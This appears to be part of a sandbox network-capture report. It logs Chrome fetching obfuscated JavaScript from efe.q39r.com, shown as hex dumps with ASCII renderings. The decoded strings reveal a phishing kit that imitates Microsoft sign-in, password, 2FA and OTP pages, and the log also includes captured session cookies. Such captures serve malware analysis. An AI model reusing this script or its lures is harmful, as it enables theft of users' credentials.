                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 49 10 0f f1 f9 f3 34 67 bd 3f f3 47 f2 33 13 26 d3 99 30 4c 26 e9 24 85 40 52 36 bb a5 e2 88 55 8c 15 6f 9d dd 3a ed 9a 53 a7 3d 0a d4 1c b3 db 62 55 0b a1 75 ca 5d 7a ac 57 38 5b 55 18 7c 37 fb 27 fe 25 e6 f2 75 2e 9c 88 31 31 8e 19 67 3c c6 ba 5e c7 a0 eb fa 4a c9 da 50 42 1b 4a 48 42 02 11 f0 6b fa b3 0f 0e 89 0a 91 8a 5d c4 80 28 24 a5 0d 44 ae 16 ab 53 22 75 be b7 ce 37 e2 fc ab 39 9f 38 15 a3 ee d4 9c 1a 55 a3 e6 37 13 d4 a6 ed 52 24 04 df 78 a9 f9 ac 67 d0 58 9b 7a 56 81 2c a8 24 a5 19 ab 89 79 c6 3a 8e 8d 8a 88 86 51 24 4f 4d c7 b1 f6 b7 9f 71 cc e7 20 a3 88 08 28 df 96 4f e5 14 c4 00 22 12 64 3c 07 6c c8 ed 39 a9 fd 7c 5e 42 08 72 b6 35 8f d0 c3 f3 a7 fd cc b9 79 69 bb 44 99 0f b9 5f 84 16 09 3c 50 9b f9 6f 92 11 08 a9 28 52 65 ab 49 eb 90 c9 96
                                                                                  Data Ascii: I4g?G3&0L&$@R6Uo:S=bUu]zW8[U|7'%u.11g<^JPBJHBk]($DS"u798U7R$xgXzV,$y:Q$OMq (O"d<l9|^Br5yiD_<Po(ReI
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 97 8e 0c 63 96 10 1c 40 42 44 dd f4 16 cf 30 00 2b fb 79 0b 30 ab c4 72 0d 2d 40 8d fe 19 13 b5 2f 74 e2 3e 24 50 23 ab dc 2a 66 4d 64 c4 fc ff 2f 53 ab 6d 24 50 26 09 49 5d 09 75 9d 3e c1 ea 31 1f d2 98 cf 56 cd 54 a8 74 6a 7f 21 1b e3 9c 0f 44 44 22 1d 29 45 26 48 55 24 92 52 07 92 54 55 20 21 75 7d 24 c8 3a 01 40 86 24 32 00 8a cd 24 e5 2d 59 9e 72 a6 cc 4b 24 d5 13 80 aa 7a 82 60 1b 94 34 ce 2d 67 b1 1c ca 96 d5 9c 33 32 e3 a4 1a e3 36 db 24 c7 b1 8d db a9 6a 45 cd 8a 9a 55 8a e3 a8 9a fd 86 aa 55 d5 ac d4 1a bf 33 7e d7 67 f8 e7 6d 4f ce f6 e5 66 e3 7f 46 56 c8 0a 61 36 e5 a3 4e 26 1e 46 a2 08 72 83 40 08 87 47 e1 7f 99 5a a6 68 7c 99 6e 6c d2 0f 2b 33 dc e8 4e 91 71 44 5d 90 6c 29 8d ba 7f af 41 f7 5b 43 0e ce 0d 46 16 90 e1 0e ce 11 23 c7 5d f9 38
                                                                                  Data Ascii: c@BD0+y0r-@/t>$P#*fMd/Sm$P&I]u>1VTtj!DD")E&HU$RTU !u}$:@$2$-YrK$z`4-g326$jEUU3~gmOfFVa6N&Fr@GZh|nl+3NqD]l)A[CF#]8
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 35 e1 43 b4 b6 e2 5b 28 0a 7e 3f b8 60 01 41 a5 a2 9d 5f aa aa 92 e7 97 9e 00 03 7a 83 f2 df f4 f1 96 7c fe b4 e4 ea d5 9a f9 6c b0 ba 4a 10 6f b7 59 2c ed 74 74 e4 f7 a7 d3 2b 96 40 40 51 66 f5 e7 a0 33 8f 73 f2 d6 c3 e5 9d c3 71 fc 46 72 66 3c 24 2e ce 60 06 3a c8 29 d6 a8 8f 62 ff a8 a5 b5 cd eb 44 76 4b 25 94 fc d0 62 76 e3 42 5d fd 97 64 4c 8b a5 52 6f f8 db 8f 00 94 fc c8 46 5c bd 1c c3 40 2b d1 7a 43 c4 ad 17 b2 b7 ee 9b 4d 09 0d f9 6d 07 99 10 1d 47 e6 96 3a 20 3d bc 3a 0d 3e bf 95 84 ea 25 93 ae 69 08 6c df 80 35 2a 08 70 c7 de 92 9c 79 e0 1a 17 e6 d0 2b 30 1e 2f 83 0e c7 e9 73 30 77 e7 e6 02 22 bb d8 06 99 5b ee 22 53 80 20 c8 6e 2c 06 05 26 12 28 14 52 ba 16 12 3d a2 47 3f 10 f5 06 a5 24 4d 82 75 e6 ad 90 27 62 69 e9 36 4c 84 88 93 25 f6 f6 23
                                                                                  Data Ascii: 5C[(~?`A_z|lJoY,tt+@@Qf3sqFrf<$.`:)bDvK%bvB]dLRoF\@+zCMmG: =:>%il5*py+0/s0w"["S n,&(R=G?$Mu'bi6L%#
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: f3 54 e7 d6 9d 2d b4 a6 93 cf 99 1f a7 dd 6e 68 53 44 dd 65 65 89 d1 c0 a3 92 64 cc 31 18 63 26 13 31 4e cf 58 79 53 b2 2e db 9a 28 b6 9b 3c a6 00 5c 5e 11 8b 83 4b be 05 32 16 f2 27 f7 9c df b0 9c 1c 87 3a fa 62 03 4e 5f dc 30 32 d9 0e 2d 29 bb 39 86 5a ea 25 1c f9 80 80 d3 b0 59 47 03 e1 38 0e 99 e4 42 e4 67 ce e4 d4 da 88 c7 03 50 4c 29 22 8c 02 70 3a 8b 8a 3b 0f 04 48 26 b5 d1 e4 52 e7 01 3b 4a af d0 d3 a7 68 fe d1 72 c3 4a 60 ba 24 bf 8f 51 eb 11 25 b1 c6 4b 41 a6 d8 73 32 1b 16 4b c4 62 8e e3 36 ec 6e b3 cd 37 b4 0e 4b 95 68 ab 33 1a 0d ac 6a 2b cd a4 45 22 f2 62 82 62 42 1d c3 cc f9 59 5f 50 eb 07 b4 8a da 4d aa 17 47 d3 fa a5 80 8d 11 25 a5 a5 8e 5b 88 5c b9 82 21 5e 88 6c 18 63 03 d6 93 18 f3 cb 40 59 d9 d2 20 37 88 18 e8 62 0c ab b3 f8 99 33 4f
                                                                                  Data Ascii: T-nhSDeed1c&1NXyS.(<\^K2':bN_02-)9Z%YG8BgPL)"p:;H&R;JhrJ`$Q%KAs2Kb6n7Kh3j+E"bbBY_PMG%[\!^lc@Y 7b3O
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 41 9f 82 2c b7 fc 55 50 9b 51 70 75 a8 cf 20 94 27 85 0a 16 c2 d5 50 55 97 db 1a cc e4 ea f8 bf 7f 82 9d cf b0 bf bf a8 d2 cf 05 72 5b e8 50 23 0f 23 4b 61 90 94 da f0 4d c9 51 9e 26 0a ec ec ab 69 b4 bd c3 2f 0a f0 74 03 f6 16 2e 59 39 12 0b bc 0c 0d 75 a9 8f 01 48 d7 04 85 96 d2 ab 02 9b de 6d db bd 90 bc 86 ef 83 5a 63 5b 32 e2 71 f8 6e c1 87 75 a9 ee 4c f7 99 27 02 3c 78 27 d8 98 de f7 56 7f 6e f1 fc aa 81 eb 24 c5 fb 60 e0 b0 f2 f0 af dd 25 60 5f 6c d7 6b c0 60 ea 09 fc a1 7e ef 21 d2 65 be 87 84 64 f1 c8 69 fa 9c 49 2f cf 79 79 88 42 e1 4d be 7d 02 60 bf 63 b8 ea ea 63 24 2b 5c 48 cf ca 79 d8 58 89 bd 6f 81 38 cf 87 07 47 13 25 b0 2d d0 2c 71 94 b6 07 95 04 aa e5 65 bc fd e1 eb 93 81 1b a5 d7 ee 19 35 2a 5a aa 17 d4 e1 0e 65 4b 21 2d a7 bf d7 25 e2
                                                                                  Data Ascii: A,UPQpu 'PUr[P##KaMQ&i/t.Y9uHmZc[2qnuL'<x'Vn$`%`_lk`~!ediI/yyBM}`cc$+\HyXo8G%-,qe5*ZeK!-%
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 13 9a 90 a7 8b 89 35 60 8b 3c b7 b7 76 cf d3 be da d0 82 50 1b dc 81 52 9f 2b 78 b5 85 1a db 2f 23 11 ee 7e 0f 9c d7 f5 b8 cb 06 d1 4f 79 55 8a 13 9b 6a a8 95 46 95 37 af 7b 7d 90 cb 24 1d 9e 26 31 5b 76 a7 8e 76 62 74 7b e0 dc a7 f1 6e 9f 45 d5 21 b2 23 85 2c cb e7 31 09 a3 7a 4c d0 45 20 b1 44 fe 05 66 c7 02 03 dc df d5 bb 25 f4 ec 02 f0 c1 23 0b fa 7f ae 9b 73 07 7b 16 f5 36 ec ec 00 db ec 7f d4 4b 78 3e 73 73 9f 0a ae ec e5 80 c4 cf 0a 3d 62 99 08 c1 b2 7d c7 70 b5 8c c7 69 52 40 79 3c 9f b9 99 d4 52 6e df 0a 35 b9 f0 ac 83 b5 6c 74 9e b8 70 fd 1d b6 ee 75 41 04 b5 ad 5c 10 e6 ad df 53 fe 59 1e 0a 54 02 09 f8 5e ab e5 8c c5 72 4c 47 c6 3b 62 55 95 51 f0 eb 4f 75 3e 57 a6 36 98 bc fe b1 bc ff 61 18 a2 79 e6 01 b9 02 66 9e 81 b8 b7 6b 51 78 30 95 72 f9
                                                                                  Data Ascii: 5`<vPR+x/#~OyUjF7{}$&1[vvbt{nE!#,1zLE Df%#s{6Kx>ss=b}piR@y<Rn5ltpuA\SYT^rLG;bUQOu>W6ayfkQx0r
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 55 62 10 69 58 16 18 ff 45 1e a2 6d 55 84 60 bb 94 83 f1 a5 aa 10 eb 80 6a 04 ba dd 16 24 bb cb 76 94 bb db 0e 54 fa b4 dd 28 f7 19 9d a8 f4 59 7b 91 ec f3 f6 a1 d0 17 ec 47 b1 2f ea 42 a1 2f 39 80 62 df 74 12 bc df 77 06 bc 3f 73 01 b9 7e ee 71 e4 fb bb 2d ec ef 7f d2 19 f5 41 7b 18 ef 31 87 58 ef 21 27 d1 79 d4 69 74 9e 74 8d 23 23 9b 2c 50 b6 a6 80 27 3b 52 c2 93 d9 40 c0 e7 aa a0 90 01 f3 29 68 ec d8 71 e2 04 83 80 00 e3 c2 05 82 1b 37 71 1e 3c 50 15 2c 96 c1 03 90 05 75 49 6e 2d 19 e1 95 12 4e d0 eb 09 a1 25 6a 42 ad 00 59 26 63 cf 71 3e 9d 2c 30 95 67 c9 12 c6 10 a1 01 97 41 48 16 7e 72 c0 e5 e1 a3 00 5c 91 be b5 13 b4 60 8d 50 60 16 62 8c 23 2c 93 87 41 a6 b8 c0 32 1b d9 cc f1 84 5d ca eb c5 8d 70 d0 ac bc 4b 85 93 72 39 40 ae f8 bc 94 2b 97 55 20
                                                                                  Data Ascii: UbiXEmU`j$vT(Y{G/B/9btw?s~q-A{1X!'yitt##,P';R@)hq7q<P,uIn-N%jBY&cq>,0gAH~r\`P`b#,A2]pKr9@+U
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 3c 41 79 a5 b8 da 6d 00 aa 75 3c 04 9b 2b 02 72 61 45 50 0c 27 48 8a 66 58 8e 17 c4 72 ff 0a aa a6 1b a6 65 03 00 88 b0 24 13 ca b8 50 54 ad 3e b1 db 03 04 84 eb 88 80 62 38 41 52 34 c3 72 bc 20 96 b6 51 46 51 6b 9b a9 63 98 56 a3 e2 13 15 c2 04 21 e9 30 60 05 83 86 c4 8f e9 a0 a9 ff f0 17 a0 b7 17 e7 07 65 da fd 98 7e d8 04 c0 0d b5 75 78 ca 39 2a af 15 ac 6d 98 37 9c 46 60 a4 51 46 1b 63 ac 64 29 52 a5 49 97 21 53 56 45 1d 2a 36 25 95 a2 4c b9 8a 2a 47 ac 4a 54 ab 51 5b dd e8 d5 a3 41 e3 73 28 bc 75 10 b4 db 41 a5 28 53 8e 1e d2 f3 3a cc bc 1d 7c fc 10 25 da bd f2 fc a6 e8 16 82 4b 39 b0 71 4d 28 28 c1 54 d4 34 0d d5 a6 e7 9b d7 02 78 db f5 6f 2c 5c 2e 36 76 cf fe a6 f4 a5 10 31 09 09 d0 9e 36 f0 1f 3e 12 3b 49 4b 4b 4b 4b 4b bf cf 6e e5 eb f8 ee 58 bb
                                                                                  Data Ascii: <Aymu<+raEP'HfXre$PT>b8AR4r QFQkcV!0`e~ux9*m7F`QFcd)RI!SVE*6%L*GJTQ[As(uA(S:|%K9qM((T4xo,\.6v16>;IKKKKKnX
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 48 51 a2 c5 d8 27 43 26 02 22 92 13 20 64 14 59 b2 e5 a0 3a 99 67 82 e6 ee 72 cf 1d 66 c7 a3 2c 1a da 79 0f 13 14 29 92 e2 71 c9 44 e4 e7 84 a0 c2 9f f7 0e ba a8 11 61 68 5f fa 1d ff f6 b8 d7 09 45 9d f7 18 61 a2 cf d1 a7 76 8f 13 7e b0 51 c5 d3 5b 09 40 57 2c 6f 6b b6 61 22 ea 37 fd 68 16 80 a1 c0 35 c2 0c d2 3a 85 ef 21 50 78 14 9f 15 27 6e bd a6 4d 6a 70 82 bc 56 5c ed c3 07 4f fc db 7e b8 f3 ce 26 a0 dc bc 05 0a 43 71 81 c0 11 41 31 9c 20 29 9a 61 39 5e 10 3b a3 77 e9 b5 a7 54 3d eb 39 f8 84 11 13 21 91 29 54 1a 9d c1 64 b1 39 5c 5e fe 82 0a 00 c0 d0 b2 c2 20 28 56 b8 c4 22 c4 92 8f 4b c4 db e9 d5 16 77 f3 73 34 90 cb 61 6b a5 67 b8 d1 63 dc 12 db 49 a1 78 8f 3a 70 56 78 9c f7 22 15 6d 55 d4 d2 cd 70 8f 4e b6 dd 48 9f a8 82 3e b4 c1 8c 26 b3 25 20 c1
                                                                                  Data Ascii: HQ'C&" dY:grf,y)qDah_Eav~Q[@W,oka"7h5:!Px'nMjpV\O~&CqA1 )a9^;wT=9!)Td9\^ (V"Kws4akgcIx:pVx"mUpNH>&%


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  41192.168.2.1749755172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:33 UTC1414OUTGET /345AebFBkUb4itsJp2dEx9Nz1WrklGGnhP4AVwQmYV89110 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Referer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:34 UTC657INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:34 GMT
                                                                                  Content-Type: application/javascript
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="345AebFBkUb4itsJp2dEx9Nz1WrklGGnhP4AVwQmYV89110"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ANaInrH40eM9%2FNMo6hn8nFUSo0tqbE4t%2Fcb8tfmjz9SOeqzwTms5AQfzu2YhI7VqWWwq6luezrVryvM03Vce09EAS54bJh3qiX2XBJBDPRQcM9GyjtGVmp82Gzu1oA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fada52807b0b8-ATL
                                                                                  2024-04-25 16:23:34 UTC712INData Raw: 33 37 38 61 0d 0a 63 6f 6e 73 74 20 5f 30 78 33 63 30 62 36 39 3d 5f 30 78 34 30 62 64 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 66 66 61 33 65 2c 5f 30 78 37 34 33 61 34 66 29 7b 63 6f 6e 73 74 20 5f 30 78 31 66 33 38 61 38 3d 5f 30 78 34 30 62 64 2c 5f 30 78 32 64 38 38 62 36 3d 5f 30 78 31 66 66 61 33 65 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 34 36 31 39 34 34 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 66 33 38 61 38 28 30 78 32 30 62 29 29 2f 30 78 31 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 66 33 38 61 38 28 30 78 33 31 39 29 29 2f 30 78 32 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 66 33 38 61 38 28 30 78 32 64 30 29 29 2f 30 78 33 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 66 33 38 61 38 28 30
                                                                                  Data Ascii: 378aconst _0x3c0b69=_0x40bd;(function(_0x1ffa3e,_0x743a4f){const _0x1f38a8=_0x40bd,_0x2d88b6=_0x1ffa3e();while(!![]){try{const _0x461944=-parseInt(_0x1f38a8(0x20b))/0x1+parseInt(_0x1f38a8(0x319))/0x2*(parseInt(_0x1f38a8(0x2d0))/0x3)+parseInt(_0x1f38a8(0
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 66 66 29 5d 28 5f 30 78 33 63 30 62 36 39 28 30 78 33 33 32 29 29 5b 5f 30 78 33 63 30 62 36 39 28 30 78 32 64 66 29 5d 5b 5f 30 78 33 63 30 62 36 39 28 30 78 32 65 31 29 5d 28 5f 30 78 33 63 30 62 36 39 28 30 78 31 65 37 29 29 26 26 28 76 69 65 77 3d 5f 30 78 33 63 30 62 36 39 28 30 78 32 63 38 29 29 3b 64 6f 63 75 6d 65 6e 74 5b 27 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 27 5d 28 5f 30 78 33 63 30 62 36 39 28 30 78 32 61 38 29 29 26 26 21 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 33 63 30 62 36 39 28 30 78 32 66 66 29 5d 28 5f 30 78 33 63 30 62 36 39 28 30 78 32 61 38 29 29 5b 27 63 6c 61 73 73 4c 69 73 74 27 5d 5b 5f 30 78 33 63 30 62 36 39 28 30 78 32 65 31 29 5d 28 5f 30 78 33 63 30 62 36 39 28 30 78 31 65 37 29 29 26 26 28 76 69 65 77 3d 27 75 6e 61 6d
                                                                                  Data Ascii: ff)](_0x3c0b69(0x332))[_0x3c0b69(0x2df)][_0x3c0b69(0x2e1)](_0x3c0b69(0x1e7))&&(view=_0x3c0b69(0x2c8));document['getElementById'](_0x3c0b69(0x2a8))&&!document[_0x3c0b69(0x2ff)](_0x3c0b69(0x2a8))['classList'][_0x3c0b69(0x2e1)](_0x3c0b69(0x1e7))&&(view='unam
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 32 62 65 33 36 39 28 30 78 32 39 31 29 29 5b 5f 30 78 32 62 65 33 36 39 28 30 78 33 30 31 29 5d 28 29 3b 7d 7d 7d 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 69 6e 67 61 6e 69 6d 61 74 69 6f 6e 28 5f 30 78 31 63 62 61 63 63 29 7b 63 6f 6e 73 74 20 5f 30 78 31 66 30 32 32 39 3d 5f 30 78 33 63 30 62 36 39 3b 5f 30 78 31 63 62 61 63 63 3d 3d 30 78 30 26 26 28 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 66 30 32 32 39 28 30 78 32 66 66 29 5d 28 5f 30 78 31 66 30 32 32 39 28 30 78 31 66 37 29 2b 76 69 65 77 29 5b 5f 30 78 31 66 30 32 32 39 28 30 78 32 39 32 29 5d 28 5f 30 78 31 66 30 32 32 39 28 30 78 32 35 63 29 29 5b 5f 30 78 31 66 30 32 32 39 28 30 78 32 64 66 29 5d 5b 27 61 64 64 27 5d 28 27 6c 6f 61 64 69 6e 67 27 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30
                                                                                  Data Ascii: 2be369(0x291))[_0x2be369(0x301)]();}}}}});function loadinganimation(_0x1cbacc){const _0x1f0229=_0x3c0b69;_0x1cbacc==0x0&&(document[_0x1f0229(0x2ff)](_0x1f0229(0x1f7)+view)[_0x1f0229(0x292)](_0x1f0229(0x25c))[_0x1f0229(0x2df)]['add']('loading'),document[_0
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 5c 78 32 30 61 63 63 6f 75 6e 74 27 2c 27 61 6c 74 27 2c 27 5c 78 32 30 3c 61 5c 78 32 30 68 72 65 66 3d 5c 78 32 32 23 5c 78 32 32 5c 78 32 30 64 61 74 61 2d 69 64 3d 5c 78 32 32 27 2c 27 73 65 63 74 69 6f 6e 73 5f 27 2c 27 64 65 73 63 27 2c 27 63 6c 69 63 6b 65 64 27 2c 27 69 41 64 64 69 74 69 6f 6e 61 6c 50 72 6f 6f 66 49 6e 66 6f 27 2c 27 75 72 6c 28 5c 78 32 37 27 2c 27 53 65 6e 64 5c 78 32 30 61 6e 6f 74 68 65 72 5c 78 32 30 72 65 71 75 65 73 74 27 2c 27 73 69 67 6e 49 6e 41 6e 6f 74 68 65 72 57 61 79 27 2c 27 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 27 2c 27 61 75 74 68 63 61 6c 6c 69 6d 67 27 2c 27 2e 69 41 64 64 69 74 69 6f 6e 61 6c 50 72 6f 6f 66 49 6e 66 6f 5c 78 32 30 69 6e 70 75 74 5b 74 79 70 65 3d 5c 78 32 32 72 61 64 69 6f 5c 78 32 32
                                                                                  Data Ascii: \x20account','alt','\x20<a\x20href=\x22#\x22\x20data-id=\x22','sections_','desc','clicked','iAdditionalProofInfo','url(\x27','Send\x20another\x20request','signInAnotherWay','backgroundImage','authcallimg','.iAdditionalProofInfo\x20input[type=\x22radio\x22
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 30 66 69 6e 64 5c 78 32 30 61 6e 5c 78 32 30 61 63 63 6f 75 6e 74 5c 78 32 30 77 69 74 68 5c 78 32 30 74 68 61 74 5c 78 32 30 75 73 65 72 6e 61 6d 65 2e 5c 78 32 30 54 72 79 5c 78 32 30 61 6e 6f 74 68 65 72 2c 5c 78 32 30 6f 72 5c 78 32 30 67 65 74 5c 78 32 30 61 5c 78 32 30 6e 65 77 5c 78 32 30 4d 69 63 72 6f 73 6f 66 74 5c 78 32 30 61 63 63 6f 75 6e 74 2e 27 2c 27 72 65 64 69 72 65 63 74 65 64 5c 78 32 30 62 61 63 6b 5c 78 32 30 74 6f 5c 78 32 30 73 69 67 6e 5c 78 32 30 69 6e 27 2c 27 6b 65 79 75 70 27 2c 27 6f 74 70 5c 78 32 30 73 65 6e 74 27 2c 27 73 65 63 74 69 6f 6e 5f 32 66 61 27 2c 27 73 69 67 6e 75 70 27 2c 27 79 6f 75 5c 78 32 30 64 6f 6e 74 5c 78 32 30 68 61 76 65 5c 78 32 30 61 63 63 65 73 73 27 2c 27 2e 74 69 74 6c 65 27 2c 27 74 69 74 6c 65
                                                                                  Data Ascii: 0find\x20an\x20account\x20with\x20that\x20username.\x20Try\x20another,\x20or\x20get\x20a\x20new\x20Microsoft\x20account.','redirected\x20back\x20to\x20sign\x20in','keyup','otp\x20sent','section_2fa','signup','you\x20dont\x20have\x20access','.title','title
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 75 74 74 6f 6e 2e 73 68 6f 77 2d 68 69 64 65 2d 62 74 6e 27 2c 27 73 63 72 69 70 74 5b 73 72 63 5e 3d 5c 78 32 32 27 2c 27 70 6f 73 69 74 69 6f 6e 27 2c 27 70 6f 70 27 2c 27 73 65 63 74 69 6f 6e 5f 75 6e 61 6d 65 27 2c 27 4e 65 78 74 27 2c 27 69 45 6e 74 65 72 50 72 6f 6f 66 44 65 73 63 27 2c 27 2e 6c 6f 61 64 69 6e 67 2d 63 6f 6e 74 61 69 6e 65 72 27 2c 27 68 74 74 70 73 3a 2f 2f 68 74 74 70 62 69 6e 2e 6f 72 67 2f 69 70 27 2c 27 61 75 74 68 63 61 6c 6c 27 2c 27 3c 73 70 61 6e 3e 53 6f 72 72 79 2c 5c 78 32 30 77 65 5c 78 32 37 72 65 5c 78 32 30 68 61 76 69 6e 67 5c 78 32 30 74 72 6f 75 62 6c 65 5c 78 32 30 76 65 72 69 66 79 69 6e 67 5c 78 32 30 79 6f 75 72 5c 78 32 30 61 63 63 6f 75 6e 74 2e 5c 78 32 30 50 6c 65 61 73 65 5c 78 32 30 74 72 79 5c 78 32 30
                                                                                  Data Ascii: utton.show-hide-btn','script[src^=\x22','position','pop','section_uname','Next','iEnterProofDesc','.loading-container','https://httpbin.org/ip','authcall','<span>Sorry,\x20we\x27re\x20having\x20trouble\x20verifying\x20your\x20account.\x20Please\x20try\x20
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 5c 78 32 30 61 72 69 61 2d 72 65 71 75 69 72 65 64 3d 5c 78 32 32 74 72 75 65 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 6c 61 62 65 6c 3d 5c 78 32 32 45 6d 61 69 6c 5c 78 32 30 6e 61 6d 65 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 5c 78 32 32 69 50 72 6f 6f 66 49 6e 70 75 74 45 72 72 6f 72 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 6c 61 62 65 6c 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 5c 78 32 30 6e 6f 4c 65 66 74 42 6f 72 64 65 72 5c 78 32 30 6f 75 74 6c 6f 6f 6b 45 6d 61 69 6c 4c 61 62 65 6c 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 69 43 6f 6e 66 69 72 6d 50 72 6f 6f 66 45 6d 61 69 6c
                                                                                  Data Ascii: \x20aria-required=\x22true\x22\x20aria-label=\x22Email\x20name\x22\x20aria-describedby=\x22iProofInputError\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<label\x20class=\x22input-group-addon\x20noLeftBorder\x20outlookEmailLabel\x22\x20id=\x22iConfirmProofEmail
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 5f 63 6f 6e 66 69 72 6d 65 6d 61 69 6c 27 2c 27 53 69 67 6e 5c 78 32 30 69 6e 5c 78 32 30 61 6e 6f 74 68 65 72 5c 78 32 30 77 61 79 27 2c 27 62 6f 64 79 27 2c 27 6c 69 6e 6b 6f 70 74 69 6f 6e 63 6c 69 63 6b 28 74 68 69 73 29 27 2c 27 6d 75 6c 74 69 70 6c 65 61 63 63 6f 75 6e 74 6f 70 74 69 6f 6e 73 27 2c 27 32 66 61 5c 78 32 30 69 73 5c 78 32 30 6f 6e 27 2c 27 65 6d 61 69 6c 27 2c 27 74 65 6c 27 2c 27 70 61 73 73 77 6f 72 64 27 2c 27 72 61 64 69 6f 27 2c 27 62 74 6e 5f 6e 65 78 74 27 2c 27 63 6f 72 72 65 63 74 5c 78 32 30 65 6d 61 69 6c 27 2c 27 23 62 74 6e 5f 76 65 72 69 66 79 6f 74 70 27 2c 27 71 75 65 72 79 53 65 6c 65 63 74 6f 72 27 2c 27 69 50 72 6f 6f 66 50 68 6f 6e 65 45 6e 74 72 79 27 2c 27 69 63 6c 6f 75 64 2e 63 6f 6d 27 2c 27 73 65 74 41 74 74
                                                                                  Data Ascii: _confirmemail','Sign\x20in\x20another\x20way','body','linkoptionclick(this)','multipleaccountoptions','2fa\x20is\x20on','email','tel','password','radio','btn_next','correct\x20email','#btn_verifyotp','querySelector','iProofPhoneEntry','icloud.com','setAtt
